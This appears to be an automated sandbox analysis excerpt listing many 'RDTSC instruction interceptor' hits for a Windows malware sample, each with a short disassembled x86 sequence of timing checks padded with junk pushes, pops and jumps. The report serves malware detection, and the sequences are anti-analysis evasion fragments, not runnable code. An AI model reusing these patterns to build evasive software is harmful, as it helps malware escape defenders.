                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1068E20 second address: 1068E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F449CEB0746h 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1068E3D second address: 1068E5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F449CC63D7Bh 0x00000008 jmp 00007F449CC63D7Dh 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1068E5D second address: 1068E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1029177 second address: 10291A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F449CC63D8Ah 0x00000016 jmp 00007F449CC63D84h 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10291A1 second address: 1029220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0746h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F449CEB073Bh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jno 00007F449CEB0744h 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F449CEB0738h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov ecx, 741C52E5h 0x0000003a pushad 0x0000003b push edi 0x0000003c movsx edi, si 0x0000003f pop ecx 0x00000040 popad 0x00000041 push 4EBDBC8Ch 0x00000046 jp 00007F449CEB073Eh 0x0000004c push esi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102930A second address: 1029310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1029310 second address: 1029314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1029314 second address: 1029345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F449CC63D8Dh 0x0000000f xchg eax, esi 0x00000010 mov di, 67AFh 0x00000014 push eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102950F second address: 1029513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10296CE second address: 10296EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F449CC63D87h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1029F91 second address: 1008805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F449CEB0738h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 call dword ptr [ebp+122D1DB3h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1069574 second address: 1069578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1069578 second address: 106957C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 106997B second address: 106997F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 106997F second address: 1069999 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F449CEB0736h 0x00000008 jmp 00007F449CEB0740h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1069999 second address: 10699B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F449CC63D81h 0x00000008 jnc 00007F449CC63D76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1069B06 second address: 1069B0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 106C432 second address: 106C448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F449CC63D81h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 106E807 second address: 106E816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CEB073Ah 0x00000009 pop esi 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 106E500 second address: 106E515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 jbe 00007F449CC63D82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 106E515 second address: 106E51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10718FA second address: 1071907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F449CC63D78h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE8C26 second address: FE8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FE8C2B second address: FE8C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1071319 second address: 107131D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107131D second address: 1071381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 jmp 00007F449CC63D83h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F449CC63D76h 0x0000001b popad 0x0000001c js 00007F449CC63D7Ah 0x00000022 pushad 0x00000023 popad 0x00000024 push edx 0x00000025 pop edx 0x00000026 popad 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F449CC63D7Ch 0x0000002f jmp 00007F449CC63D7Ch 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10714CB second address: 10714CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10714CF second address: 10714D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FEC145 second address: FEC14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FEC14B second address: FEC151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: FEC151 second address: FEC15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1076C09 second address: 1076C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F449CC63D76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1076F07 second address: 1076F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1076F0D second address: 1076F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1077049 second address: 107705D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F449CEB0736h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F449CEB073Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107705D second address: 1077085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F449CC63D7Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F449CC63D81h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1077085 second address: 107708B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107708B second address: 10770A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F449CC63D82h 0x0000000c pop ebx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10770A5 second address: 10770AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107722B second address: 1077231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1077231 second address: 1077239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1077239 second address: 1077264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F449CC63D81h 0x0000000d jmp 00007F449CC63D82h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1077264 second address: 107726A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107726A second address: 1077277 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1077277 second address: 107727D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107739F second address: 10773AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F449CC63D78h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1077E97 second address: 1077EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107AE8D second address: 107AEA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D82h 0x00000007 jnl 00007F449CC63D76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107FE39 second address: 107FE50 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F449CEB073Ch 0x00000008 je 00007F449CEB0736h 0x0000000e push eax 0x0000000f jne 00007F449CEB0736h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107F1A7 second address: 107F1B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107F4A9 second address: 107F4BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107F4BC second address: 107F4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107F4C7 second address: 107F4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 107F881 second address: 107F885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10861EC second address: 10861F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10861F0 second address: 108620C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F449CC63D86h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 108620C second address: 1086211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1086502 second address: 1086508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1086B0A second address: 1086B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1087067 second address: 108708B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F449CC63D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F449CC63D84h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 108708B second address: 1087091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1087091 second address: 108709B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090CC3 second address: 1090CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 108FE62 second address: 108FE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D80h 0x00000009 jmp 00007F449CC63D89h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090424 second address: 109042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109042A second address: 109044B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 jmp 00007F449CC63D7Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109044B second address: 109044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109044F second address: 1090453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090A03 second address: 1090A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1090A07 second address: 1090A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1096EC8 second address: 1096ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097041 second address: 109705F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F449CC63D76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007F449CC63D7Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10975DF second address: 10975E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10975E5 second address: 1097605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F449CC63D78h 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F449CC63D76h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097605 second address: 1097609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097755 second address: 109775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 109775A second address: 109775F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097B9F second address: 1097BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097BA5 second address: 1097BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1097BAA second address: 1097BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1098C8B second address: 1098C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10A1428 second address: 10A142C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10A1592 second address: 10A1596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10A1773 second address: 10A177D instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CC63D7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE2AB second address: 10AE2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F449CEB0736h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
